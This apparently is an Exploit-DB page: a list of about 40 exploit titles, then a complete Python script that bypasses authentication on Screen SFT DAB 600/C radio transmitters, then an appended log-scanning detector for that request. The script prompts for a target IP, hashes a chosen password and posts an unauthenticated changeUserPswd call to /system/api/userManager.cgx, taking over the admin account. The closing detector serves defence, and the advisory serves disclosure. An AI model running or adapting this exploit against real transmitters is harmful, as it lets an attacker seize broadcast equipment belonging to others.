
40 changes to exploits/shellcodes/ghdb

Optoma 1080PSTX Firmware C02 - Authentication Bypass
Screen SFT DAB 600/C - Authentication Bypass Account Creation
Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
Screen SFT DAB 600/C - Authentication Bypass Erase Account
Screen SFT DAB 600/C - Authentication Bypass Password Change
Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)
PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution
Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
Apache Superset 2.0.0 - Authentication Bypass
FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)
PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
Affiliate Me Version 5.0.1 - SQL Injection
Best POS Management System v1.0 - Unauthenticated Remote Code Execution
Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)
CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)
e107 v2.3.2 - Reflected XSS
File Thingie 2.5.7 - Remote Code Execution (RCE)
GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
LeadPro CRM v1.0 - SQL Injection
PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)
Prestashop 8.0.4 - CSV injection
Quicklancer v1.0 - SQL Injection
SitemagicCMS 4.4.3 - Remote Code Execution (RCE)
Smart School v1.0 - SQL Injection
Stackposts Social Marketing Tool v1.0 - SQL Injection
thrsrossi Millhouse-Project 1.414 - Remote Code Execution
TinyWebGallery v2.5 - Remote Code Execution (RCE)
WBiz Desk 1.2 - SQL Injection
Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title
Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
MobileTrans 4.0.11 - Weak Service Privilege Escalation
Trend Micro OfficeScan Client 10.0 - ACL Service LPE
eScan Management Console 14.0.1400.2281 - Cross Site Scripting
eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
96 lines
No EOL
3.5 KiB
Python
Executable file
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: This exploit circumvents the control and requirement of admin's
# old password and directly changes the password.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5774
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php
#
#
# 19.03.2023
#

import datetime
import hashlib

import colorama
import requests
from colorama import Fore, Style

colorama.init()

print(Fore.RED + Style.BRIGHT +
'''
██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████  
██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██ 
██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████  
██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██ 
██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██ 
'''
+ Style.RESET_ALL)

print(Fore.WHITE + Style.BRIGHT +
'''
ZSL and the Producers insist that no one
submit any exploits of themselves or others
performing any dangerous activities.
We will not open or view them.
'''
+ Style.RESET_ALL)

s = datetime.datetime.now()
s = s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -', s)

t = input('Enter transmitter ip: ')
p = input('Enter desired password: ')
e = '/system/api/userManager.cgx'

# The API takes the new password as an MD5 hexdigest rather than plaintext.
m5 = hashlib.md5()
m5.update(p.encode('utf-8'))
h = m5.hexdigest()
print('Your sig:', h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')

t = 'http://' + t + e
bh = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
      'Accept': 'application/json, text/plain, */*',
      'Accept-Language': 'ku-MK,en;q=0.9',
      'Accept-Encoding': 'gzip, deflate',
      'User-Agent': 'Dabber-+',
      'Connection': 'close'}

# JSON call to the userManager object; no session and no old password are sent.
j = {'ssbtIdx': 0,
     'ssbtType': 'userManager',
     'ssbtObj': {
         'changeUserPswd': {
             'username': 'admin',
             'password': h
         }
     },
    }

r = requests.post(t, headers=bh, json=j)
if r.status_code == 200:
    print('Done.')
else:
    print('Error')
    exit(-2)
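As an added defensive example that is not part of the original exploit or of the vendor's code: a small detector that flags the request shape this script sends (a POST to /system/api/userManager.cgx carrying a userManager changeUserPswd call with no session cookie) in a list of request records. It assumes a reverse proxy or WAF in front of the transmitter that logs request bodies; the record format and the SAMPLE_LOG entries are constructed for this example.

```python
import hashlib
import json

# Endpoint and JSON field names exactly as the exploit above sends them.
TARGET_PATH = "/system/api/userManager.cgx"
RISKY_CALLS = {"changeUserPswd"}

def is_md5_hex(value) -> bool:  # the exploit sends an unsalted MD5 hexdigest
    return (isinstance(value, str) and len(value) == 32
            and all(c in "0123456789abcdef" for c in value.lower()))

def check_request(req: dict) -> list:
    """Findings for one logged request; an empty list means nothing notable."""
    if req.get("method") != "POST" or req.get("path") != TARGET_PATH:
        return []
    try:
        body = json.loads(req.get("body") or "")
    except json.JSONDecodeError:
        return ["userManager.cgx POST with a non-JSON body"]
    calls = body.get("ssbtObj") if isinstance(body, dict) and body.get("ssbtType") == "userManager" else None
    if not isinstance(calls, dict):
        return []
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    findings = []
    for name in RISKY_CALLS & calls.keys():
        args = calls[name] if isinstance(calls[name], dict) else {}
        user = args.get("username", "?")
        # The bypass itself: a password change arriving with no session at all.
        if "cookie" not in headers:
            findings.append(f"{name} for '{user}' without any session cookie")
        # Even a legitimate change carries an unsalted MD5 of the new password.
        if is_md5_hex(args.get("password")):
            findings.append(f"{name} for '{user}' carries an unsalted MD5 password")
    return findings

def scan(log: list) -> list:
    return [f for req in log for f in check_request(req)]

def _body(user: str) -> str:
    """Constructed request body in the exact shape the exploit posts."""
    return json.dumps({"ssbtIdx": 0, "ssbtType": "userManager", "ssbtObj": {
        "changeUserPswd": {"username": user,
                           "password": hashlib.md5(b"constructed").hexdigest()}}})

# Constructed sample records, not real traffic: the unauthenticated bypass,
# an authenticated change, and an unrelated GET that must not alert.
SAMPLE_LOG = [
    {"method": "POST", "path": TARGET_PATH, "headers": {"User-Agent": "Dabber-+"}, "body": _body("admin")},
    {"method": "POST", "path": TARGET_PATH, "headers": {"Cookie": "SESSID=constructed"}, "body": _body("operator")},
    {"method": "GET", "path": "/", "headers": {}, "body": ""},
]
```

Running `scan(SAMPLE_LOG)` yields two findings for the first record, one for the second and none for the third; on a real deployment the first finding is the one to alert on, the second is a reason to push the vendor for salted hashing over TLS.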